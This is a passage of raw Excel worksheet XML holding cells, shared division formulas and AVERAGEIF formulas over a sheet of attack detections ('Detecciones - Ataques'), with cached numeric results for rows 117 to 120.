        <f t="shared" si="168"/>
        <v>3</v>
      </c>
      <c r="CR117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CS117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CT117" s="518">
        <f t="shared" si="168"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CV117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="CW117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="CX117" s="518">
        <f t="shared" si="168"/>
        <v>5.5</v>
      </c>
      <c r="CY117" s="518">
        <f t="shared" si="168"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="DA117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="DB117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="DC117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="DD117" s="518">
        <f t="shared" si="168"/>
        <v>5</v>
      </c>
      <c r="DE117" s="518">
        <f t="shared" si="168"/>
        <v>1.6</v>
      </c>
      <c r="DF117" s="518">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="DG117" s="518" t="str">
        <f t="shared" si="168"/>
        <v>-</v>
      </c>
      <c r="DH117" s="518">
        <f t="shared" si="168"/>
        <v>1.053333333</v>
      </c>
      <c r="DI117" s="518">
        <f t="shared" si="168"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ117" s="519">
        <f t="shared" si="168"/>
        <v>1.363636364</v>
      </c>
      <c r="DK117" s="271"/>
      <c r="DO117" s="279"/>
      <c r="DP117" s="271"/>
      <c r="DQ117" s="271"/>
      <c r="DR117" s="271"/>
      <c r="DS117" s="271"/>
      <c r="DT117" s="271"/>
      <c r="DU117" s="271"/>
      <c r="DV117" s="271"/>
      <c r="DW117" s="271"/>
      <c r="DX117" s="271"/>
      <c r="DY117" s="271"/>
      <c r="DZ117" s="271"/>
      <c r="EA117" s="271"/>
      <c r="EB117" s="271"/>
      <c r="EC117" s="271"/>
      <c r="ED117" s="280"/>
      <c r="EG117" s="279"/>
      <c r="EH117" s="271"/>
      <c r="EI117" s="271"/>
      <c r="EJ117" s="271"/>
      <c r="EK117" s="271"/>
      <c r="EL117" s="271"/>
      <c r="EM117" s="271"/>
      <c r="ER117" s="271"/>
      <c r="ES117" s="271"/>
      <c r="ET117" s="271"/>
      <c r="EU117" s="271"/>
      <c r="EV117" s="271"/>
      <c r="EW117" s="271"/>
      <c r="EX117" s="271"/>
      <c r="EY117" s="271"/>
      <c r="EZ117" s="271"/>
      <c r="FA117" s="280"/>
    </row>
    <row r="118">
      <c r="J118" s="277"/>
      <c r="K118" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BQ3:BQ139)</f>
        <v>0.0499595818</v>
      </c>
      <c r="L118" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DG3:DG139)</f>
        <v>0.2298473484</v>
      </c>
      <c r="M118" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EW3:EW139)</f>
        <v>0.3781945885</v>
      </c>
      <c r="N118" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GM3:GM139)</f>
        <v>0.4444040772</v>
      </c>
      <c r="O118" s="278"/>
      <c r="Q118" s="271"/>
      <c r="R118" s="352" t="s">
        <v>2590</v>
      </c>
      <c r="S118" s="501">
        <f t="shared" ref="S118:V118" si="169">S70/S$31</f>
        <v>0.003081211943</v>
      </c>
      <c r="T118" s="501">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="U118" s="501">
        <f t="shared" si="169"/>
        <v>6.047619048</v>
      </c>
      <c r="V118" s="501">
        <f t="shared" si="169"/>
        <v>4.631578947</v>
      </c>
      <c r="W118" s="501">
        <f t="shared" si="104"/>
        <v>26</v>
      </c>
      <c r="X118" s="501">
        <f t="shared" ref="X118:AF118" si="170">X70/X$31</f>
        <v>8332.818182</v>
      </c>
      <c r="Y118" s="501">
        <f t="shared" si="170"/>
        <v>117.2857143</v>
      </c>
      <c r="Z118" s="501">
        <f t="shared" si="170"/>
        <v>555.2158622</v>
      </c>
      <c r="AA118" s="501">
        <f t="shared" si="170"/>
        <v>1.590778098</v>
      </c>
      <c r="AB118" s="501">
        <f t="shared" si="170"/>
        <v>12.34782609</v>
      </c>
      <c r="AC118" s="501">
        <f t="shared" si="170"/>
        <v>6.6</v>
      </c>
      <c r="AD118" s="501">
        <f t="shared" si="170"/>
        <v>0.0003149175053</v>
      </c>
      <c r="AE118" s="501">
        <f t="shared" si="170"/>
        <v>3.458333333</v>
      </c>
      <c r="AF118" s="502">
        <f t="shared" si="170"/>
        <v>0.04550586192</v>
      </c>
      <c r="AG118" s="271"/>
      <c r="AH118" s="352" t="s">
        <v>2590</v>
      </c>
      <c r="AI118" s="518">
        <f t="shared" ref="AI118:DJ118" si="171">IF(AI$30=0,"-",AI70/AI$31)</f>
        <v>0.001834862385</v>
      </c>
      <c r="AJ118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="AK118" s="518">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="AL118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AM118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="AN118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AO118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AP118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AQ118" s="518">
        <f t="shared" si="171"/>
        <v>4.222222222</v>
      </c>
      <c r="AR118" s="518">
        <f t="shared" si="171"/>
        <v>62</v>
      </c>
      <c r="AS118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AT118" s="518">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="AU118" s="518">
        <f t="shared" si="171"/>
        <v>6</v>
      </c>
      <c r="AV118" s="518">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="AW118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AX118" s="518">
        <f t="shared" si="171"/>
        <v>3.375</v>
      </c>
      <c r="AY118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="AZ118" s="518">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="BA118" s="518">
        <f t="shared" si="171"/>
        <v>26</v>
      </c>
      <c r="BB118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BC118" s="518">
        <f t="shared" si="171"/>
        <v>30549.66667</v>
      </c>
      <c r="BD118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BE118" s="518">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="BF118" s="518">
        <f t="shared" si="171"/>
        <v>1.5</v>
      </c>
      <c r="BG118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="BH118" s="518">
        <f t="shared" si="171"/>
        <v>792</v>
      </c>
      <c r="BI118" s="518">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="BJ118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="BK118" s="518">
        <f t="shared" si="171"/>
        <v>8</v>
      </c>
      <c r="BL118" s="518">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="BM118" s="518">
        <f t="shared" si="171"/>
        <v>1099.797995</v>
      </c>
      <c r="BN118" s="518">
        <f t="shared" si="171"/>
        <v>209.2291506</v>
      </c>
      <c r="BO118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BP118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BQ118" s="518">
        <f t="shared" si="171"/>
        <v>1.004901961</v>
      </c>
      <c r="BR118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BS118" s="518">
        <f t="shared" si="171"/>
        <v>6.5</v>
      </c>
      <c r="BT118" s="518">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="BU118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BV118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BW118" s="518">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="BX118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="BY118" s="518">
        <f t="shared" si="171"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ118" s="518">
        <f t="shared" si="171"/>
        <v>2.162601626</v>
      </c>
      <c r="CA118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CB118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="CC118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="CD118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="CE118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CF118" s="518">
        <f t="shared" si="171"/>
        <v>5</v>
      </c>
      <c r="CG118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="CH118" s="518">
        <f t="shared" si="171"/>
        <v>6</v>
      </c>
      <c r="CI118" s="518">
        <f t="shared" si="171"/>
        <v>34</v>
      </c>
      <c r="CJ118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="CK118" s="518">
        <f t="shared" si="171"/>
        <v>19</v>
      </c>
      <c r="CL118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CM118" s="518">
        <f t="shared" si="171"/>
        <v>85.5</v>
      </c>
      <c r="CN118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="CO118" s="518">
        <f t="shared" si="171"/>
        <v>2.833333333</v>
      </c>
      <c r="CP118" s="518">
        <f t="shared" si="171"/>
        <v>23</v>
      </c>
      <c r="CQ118" s="518">
        <f t="shared" si="171"/>
        <v>3</v>
      </c>
      <c r="CR118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CS118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="CT118" s="518">
        <f t="shared" si="171"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CV118" s="518">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="CW118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="CX118" s="518">
        <f t="shared" si="171"/>
        <v>9</v>
      </c>
      <c r="CY118" s="518">
        <f t="shared" si="171"/>
        <v>3.764705882</v>
      </c>
      <c r="CZ118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="DA118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="DB118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="DC118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="DD118" s="518">
        <f t="shared" si="171"/>
        <v>7</v>
      </c>
      <c r="DE118" s="518">
        <f t="shared" si="171"/>
        <v>2.4</v>
      </c>
      <c r="DF118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="DG118" s="518" t="str">
        <f t="shared" si="171"/>
        <v>-</v>
      </c>
      <c r="DH118" s="518">
        <f t="shared" si="171"/>
        <v>1.064444444</v>
      </c>
      <c r="DI118" s="518">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="DJ118" s="519">
        <f t="shared" si="171"/>
        <v>1.727272727</v>
      </c>
      <c r="DK118" s="271"/>
      <c r="DO118" s="525"/>
      <c r="DP118" s="526"/>
      <c r="DQ118" s="526"/>
      <c r="DR118" s="526"/>
      <c r="DS118" s="526"/>
      <c r="DT118" s="526"/>
      <c r="DU118" s="526"/>
      <c r="DV118" s="526"/>
      <c r="DW118" s="526"/>
      <c r="DX118" s="526"/>
      <c r="DY118" s="526"/>
      <c r="DZ118" s="526"/>
      <c r="EA118" s="526"/>
      <c r="EB118" s="526"/>
      <c r="EC118" s="526"/>
      <c r="ED118" s="527"/>
      <c r="EG118" s="279"/>
      <c r="EH118" s="271"/>
      <c r="EI118" s="271"/>
      <c r="EJ118" s="271"/>
      <c r="EK118" s="271"/>
      <c r="EL118" s="271"/>
      <c r="EM118" s="271"/>
      <c r="ER118" s="271"/>
      <c r="ES118" s="271"/>
      <c r="ET118" s="271"/>
      <c r="EU118" s="271"/>
      <c r="EV118" s="271"/>
      <c r="EW118" s="271"/>
      <c r="EX118" s="271"/>
      <c r="EY118" s="271"/>
      <c r="EZ118" s="271"/>
      <c r="FA118" s="280"/>
    </row>
    <row r="119">
      <c r="J119" s="277"/>
      <c r="K119" s="434"/>
      <c r="L119" s="353"/>
      <c r="M119" s="353"/>
      <c r="N119" s="354"/>
      <c r="O119" s="278"/>
      <c r="Q119" s="271"/>
      <c r="R119" s="352" t="s">
        <v>2591</v>
      </c>
      <c r="S119" s="501">
        <f t="shared" ref="S119:V119" si="172">S71/S$31</f>
        <v>0.005575526374</v>
      </c>
      <c r="T119" s="501">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="U119" s="501">
        <f t="shared" si="172"/>
        <v>6.166666667</v>
      </c>
      <c r="V119" s="501">
        <f t="shared" si="172"/>
        <v>6.526315789</v>
      </c>
      <c r="W119" s="501">
        <f t="shared" si="104"/>
        <v>42</v>
      </c>
      <c r="X119" s="501">
        <f t="shared" ref="X119:AF119" si="173">X71/X$31</f>
        <v>1.181818182</v>
      </c>
      <c r="Y119" s="501">
        <f t="shared" si="173"/>
        <v>118</v>
      </c>
      <c r="Z119" s="501">
        <f t="shared" si="173"/>
        <v>594.0528738</v>
      </c>
      <c r="AA119" s="501">
        <f t="shared" si="173"/>
        <v>1.659942363</v>
      </c>
      <c r="AB119" s="501">
        <f t="shared" si="173"/>
        <v>14.17391304</v>
      </c>
      <c r="AC119" s="501">
        <f t="shared" si="173"/>
        <v>13.9</v>
      </c>
      <c r="AD119" s="501">
        <f t="shared" si="173"/>
        <v>0.0005750667488</v>
      </c>
      <c r="AE119" s="501">
        <f t="shared" si="173"/>
        <v>3.875</v>
      </c>
      <c r="AF119" s="502">
        <f t="shared" si="173"/>
        <v>0.125749023</v>
      </c>
      <c r="AG119" s="271"/>
      <c r="AH119" s="352" t="s">
        <v>2591</v>
      </c>
      <c r="AI119" s="518">
        <f t="shared" ref="AI119:DJ119" si="174">IF(AI$30=0,"-",AI71/AI$31)</f>
        <v>0.004036697248</v>
      </c>
      <c r="AJ119" s="518">
        <f t="shared" si="174"/>
        <v>1</v>
      </c>
      <c r="AK119" s="518">
        <f t="shared" si="174"/>
        <v>5</v>
      </c>
      <c r="AL119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AM119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="AN119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AO119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AP119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AQ119" s="518">
        <f t="shared" si="174"/>
        <v>4.247863248</v>
      </c>
      <c r="AR119" s="518">
        <f t="shared" si="174"/>
        <v>62.75</v>
      </c>
      <c r="AS119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AT119" s="518">
        <f t="shared" si="174"/>
        <v>4</v>
      </c>
      <c r="AU119" s="518">
        <f t="shared" si="174"/>
        <v>7.5</v>
      </c>
      <c r="AV119" s="518">
        <f t="shared" si="174"/>
        <v>5</v>
      </c>
      <c r="AW119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AX119" s="518">
        <f t="shared" si="174"/>
        <v>4.5</v>
      </c>
      <c r="AY119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="AZ119" s="518">
        <f t="shared" si="174"/>
        <v>5</v>
      </c>
      <c r="BA119" s="518">
        <f t="shared" si="174"/>
        <v>42</v>
      </c>
      <c r="BB119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BC119" s="518">
        <f t="shared" si="174"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BE119" s="518">
        <f t="shared" si="174"/>
        <v>2</v>
      </c>
      <c r="BF119" s="518">
        <f t="shared" si="174"/>
        <v>1.5</v>
      </c>
      <c r="BG119" s="518">
        <f t="shared" si="174"/>
        <v>1</v>
      </c>
      <c r="BH119" s="518">
        <f t="shared" si="174"/>
        <v>792</v>
      </c>
      <c r="BI119" s="518">
        <f t="shared" si="174"/>
        <v>2</v>
      </c>
      <c r="BJ119" s="518">
        <f t="shared" si="174"/>
        <v>3</v>
      </c>
      <c r="BK119" s="518">
        <f t="shared" si="174"/>
        <v>9</v>
      </c>
      <c r="BL119" s="518">
        <f t="shared" si="174"/>
        <v>2</v>
      </c>
      <c r="BM119" s="518">
        <f t="shared" si="174"/>
        <v>1099.841434</v>
      </c>
      <c r="BN119" s="518">
        <f t="shared" si="174"/>
        <v>272.7277992</v>
      </c>
      <c r="BO119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BP119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BQ119" s="518">
        <f t="shared" si="174"/>
        <v>1.029411765</v>
      </c>
      <c r="BR119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BS119" s="518">
        <f t="shared" si="174"/>
        <v>7.5</v>
      </c>
      <c r="BT119" s="518">
        <f t="shared" si="174"/>
        <v>3</v>
      </c>
      <c r="BU119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BV119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BW119" s="518">
        <f t="shared" si="174"/>
        <v>10</v>
      </c>
      <c r="BX119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="BY119" s="518">
        <f t="shared" si="174"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ119" s="518">
        <f t="shared" si="174"/>
        <v>2.162601626</v>
      </c>
      <c r="CA119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CB119" s="518">
        <f t="shared" si="174"/>
        <v>4</v>
      </c>
      <c r="CC119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="CD119" s="518">
        <f t="shared" si="174"/>
        <v>1</v>
      </c>
      <c r="CE119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CF119" s="518">
        <f t="shared" si="174"/>
        <v>9</v>
      </c>
      <c r="CG119" s="518">
        <f t="shared" si="174"/>
        <v>1</v>
      </c>
      <c r="CH119" s="518">
        <f t="shared" si="174"/>
        <v>12</v>
      </c>
      <c r="CI119" s="518">
        <f t="shared" si="174"/>
        <v>35</v>
      </c>
      <c r="CJ119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="CK119" s="518">
        <f t="shared" si="174"/>
        <v>26</v>
      </c>
      <c r="CL119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CM119" s="518">
        <f t="shared" si="174"/>
        <v>90</v>
      </c>
      <c r="CN119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="CO119" s="518">
        <f t="shared" si="174"/>
        <v>3.5</v>
      </c>
      <c r="CP119" s="518">
        <f t="shared" si="174"/>
        <v>54</v>
      </c>
      <c r="CQ119" s="518">
        <f t="shared" si="174"/>
        <v>10</v>
      </c>
      <c r="CR119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CS119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="CT119" s="518">
        <f t="shared" si="174"/>
        <v>0.00499001996</v>
      </c>
      <c r="CU119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CV119" s="518">
        <f t="shared" si="174"/>
        <v>7</v>
      </c>
      <c r="CW119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="CX119" s="518">
        <f t="shared" si="174"/>
        <v>15</v>
      </c>
      <c r="CY119" s="518">
        <f t="shared" si="174"/>
        <v>3.941176471</v>
      </c>
      <c r="CZ119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="DA119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="DB119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="DC119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="DD119" s="518">
        <f t="shared" si="174"/>
        <v>7</v>
      </c>
      <c r="DE119" s="518">
        <f t="shared" si="174"/>
        <v>3.8</v>
      </c>
      <c r="DF119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="DG119" s="518" t="str">
        <f t="shared" si="174"/>
        <v>-</v>
      </c>
      <c r="DH119" s="518">
        <f t="shared" si="174"/>
        <v>3.082222222</v>
      </c>
      <c r="DI119" s="518">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="DJ119" s="519">
        <f t="shared" si="174"/>
        <v>1.727272727</v>
      </c>
      <c r="DK119" s="271"/>
      <c r="EG119" s="279"/>
      <c r="EH119" s="271"/>
      <c r="EI119" s="271"/>
      <c r="EJ119" s="271"/>
      <c r="EK119" s="271"/>
      <c r="EL119" s="271"/>
      <c r="EM119" s="271"/>
      <c r="ER119" s="271"/>
      <c r="ES119" s="271"/>
      <c r="ET119" s="271"/>
      <c r="EU119" s="271"/>
      <c r="EV119" s="271"/>
      <c r="EW119" s="271"/>
      <c r="EX119" s="271"/>
      <c r="EY119" s="271"/>
      <c r="EZ119" s="271"/>
      <c r="FA119" s="280"/>
    </row>
    <row r="120">
      <c r="J120" s="277"/>
      <c r="K120" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="L120" s="403" t="s">
        <v>2575</v>
      </c>
      <c r="M120" s="403" t="s">
        <v>2576</v>
      </c>
      <c r="N120" s="404" t="s">
        <v>2577</v>
      </c>
      <c r="O120" s="278"/>
      <c r="Q120" s="271"/>
      <c r="R120" s="386" t="s">
        <v>2592</v>
      </c>
      <c r="S120" s="501">
        <f t="shared" ref="S120:V120" si="175">S72/S$31</f>
        <v>0.7384637958</v>
      </c>
      <c r="T120" s="501">
        <f t="shared" si="175"/>
        <v>0.01424340292</v>
      </c>
      <c r="U120" s="501">
        <f t="shared" si="175"/>
        <v>0.126984127</v>
      </c>
      <c r="V120" s="501">
        <f t="shared" si="175"/>
        <v>0.4210526316</v>
      </c>
      <c r="W120" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X120" s="501">
        <f t="shared" ref="X120:AF120" si="176">X72/X$31</f>
        <v>0.09090909091</v>
      </c>
      <c r="Y120" s="501">
        <f t="shared" si="176"/>
        <v>113.1428571</v>
      </c>
      <c r="Z120" s="501">
        <f t="shared" si="176"/>
        <v>0.9009795822</v>
      </c>
      <c r="AA120" s="501">
        <f t="shared" si="176"/>
        <v>0.07204610951</v>
      </c>
      <c r="AB120" s="501">
        <f t="shared" si="176"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC120" s="501">
        <f t="shared" si="176"/>
        <v>2.4</v>
      </c>
      <c r="AD120" s="501">
        <f t="shared" si="176"/>
        <v>0.02427603204</v>
      </c>
      <c r="AE120" s="501">
        <f t="shared" si="176"/>
        <v>2.208333333</v>
      </c>
      <c r="AF120" s="502">
        <f t="shared" si="176"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG120" s="271"/>
      <c r="AH120" s="386" t="s">
        <v>2592</v>
      </c>
      <c r="AI120" s="518">
        <f t="shared" ref="AI120:DJ120" si="177">IF(AI$30=0,"-",AI72/AI$31)</f>
        <v>0.7386422018</v>
      </c>
      <c r="AJ120" s="518">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="AK120" s="518">
        <f t="shared" si="177"/>
        <v>0.25</v>
      </c>
      <c r="AL120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="AM120" s="518">
        <f t="shared" si="177"/>
        <v>0.01424340292</v>
      </c>
      <c r="AN120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AO120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AP120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AQ120" s="518">
        <f t="shared" si="177"/>
        <v>0.02564102564</v>
      </c>
      <c r="AR120" s="518">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="AS120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AT120" s="518">
        <f t="shared" si="177"/>
        <v>3</v>
      </c>
      <c r="AU120" s="518">
        <f t="shared" si="177"/>
        <v>2</v>
      </c>
      <c r="AV120" s="518">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="AW120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AX120" s="518">
        <f t="shared" si="177"/>
        <v>0.5</v>
      </c>
      <c r="AY120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="AZ120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BA120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BB120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BC120" s="518">
        <f t="shared" si="177"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BE120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BF120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BG120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BH120" s="518">
        <f t="shared" si="177"/>
        <v>792</v>
      </c>
      <c r="BI120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BJ120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BK120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BL120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BM120" s="518">
        <f t="shared" si="177"/>
        <v>0.1998784933</v>
      </c>
      <c r="BN120" s="518">
        <f t="shared" si="177"/>
        <v>1.346718147</v>
      </c>
      <c r="BO120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BP120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BQ120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BR120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BS120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BT120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BU120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BV120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BW120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="BX120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="BY120" s="518">
        <f t="shared" si="177"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ120" s="518">
        <f t="shared" si="177"/>
        <v>0.162601626</v>
      </c>
      <c r="CA120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CB120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CC120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CD120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CE120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CF120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CG120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CH120" s="518">
